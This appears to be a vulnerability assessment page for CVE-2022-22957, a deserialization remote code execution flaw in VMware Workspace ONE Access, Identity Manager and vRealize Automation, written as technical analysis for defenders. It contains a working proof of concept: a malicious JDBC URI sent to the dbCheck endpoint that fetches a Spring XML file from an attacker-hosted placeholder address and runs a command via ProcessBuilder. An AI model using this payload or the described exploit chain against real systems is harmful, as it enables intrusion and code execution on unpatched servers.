High
CVE-2022-22957
CVE-2022-22957
Description
VMware Workspace ONE Access, Identity Manager and vRealize Automation contain two remote code execution vulnerabilities (CVE-2022-22957 & CVE-2022-22958). A malicious actor with administrative access can trigger deserialization of untrusted data through malicious JDBC URI which may result in remote code execution.
Add Assessment
Technical Analysis
This is an authenticated remote code execution vulnerability which gives access in the context of the horizon user however authentication can easily be by-passed with CVE-2022-22956. The list of affected products and corresponding versions are:
| Vulnerable Application | Vulnerable version |
|---|---|
| VMware Workspace ONE Access (Access) | 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0 |
| VMware Identity Manager (vIDM) | 3.3.6, 3.3.5, 3.3.4, 3.3.3 |
| VMware vRealize Automation (vRA) | 8.x, 7.6 |
| VMware Cloud Foundation | 4.x |
Reason for Exploitability & Attacker Value rating.
As mentioned in my write up for CVE-2022-22956 this vulnerability was bundled up VMSA-2022-0011 along with 8 other CVEs. Out of all the CVEs in this advisory CVE-2022-22954 really stole the show as it was an unauth RCE. Not as many paid much mind to this CVE + CVE-2022-22956 (authentication by-pass) which when combined together with CVE-2022-22960 (LPE) gives attackers yet another exploitation path to unauthenticated RCE as root.
How it works
This vulnerability abuses the dbCheck method inside the com.vmware.horizon.rest.controller.system.DBConnectionCheckController class. The method accepts an attacker controlled parameter jdbcUrl which gets passed through a string of method calls until it eventually reaches a DriverManager.getConnection sink which will lead to an arbitrary JDBC URI connection.
Remote code execution can be achieved through the socketFactory property of the PostgreSQL JDBC driver. An attacker can set the socketFactory and socketFactoryArg properties in order to trigger the execution of a constructor defined in an arbitrary Java class with a controlled string argument. Due to the fact VMware Workspace One uses Spring with a PostgreSQL database FileSystemXmlApplicationContext can be used.
The attacker sends a POST request to the following URI: /SAAS/API/1.0/REST/system/dbCheck with the following data:
jdbc:postgresql://localhost:1337/saas?socketFactory=org.springframework.context.support.FileSystemXmlApplicationContext&socketFactoryArg=http://#{attacker-ip-address}:#{attacker-port-hosting-malicious-file}/#{filename}
While hosting the following file:
<beans xmlns="[http://www.springframework.org/schema/beans](http://www.springframework.org/schema/beans)" xmlns:xsi="[http://www.w3.org/2001/XMLSchema-instance](http://www.w3.org/2001/XMLSchema-instance)" xsi:schemaLocation="[http://www.springframework.org/schema/beans](http://www.springframework.org/schema/beans) [http://www.springframework.org/schema/beans/spring-beans.xsd](http://www.springframework.org/schema/beans/spring-beans.xsd)"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>touch</value> <value>/tmp/rce</value> </list> </constructor-arg> </bean> </beans>
The above file will be downloaded by the victim and the command in side the constructor-arg will be executed in the context of the horizon user.
References:
CVSS V3 Severity and Metrics
General Information
Vendors
- vmware
Products
- cloud foundation,
- identity manager 3.3.3,
- identity manager 3.3.4,
- identity manager 3.3.5,
- identity manager 3.3.6,
- vrealize automation,
- vrealize automation 7.6,
- vrealize suite lifecycle manager,
- workspace one access 20.10.0.0,
- workspace one access 20.10.0.1,
- workspace one access 21.08.0.0,
- workspace one access 21.08.0.1
Metasploit Modules
References
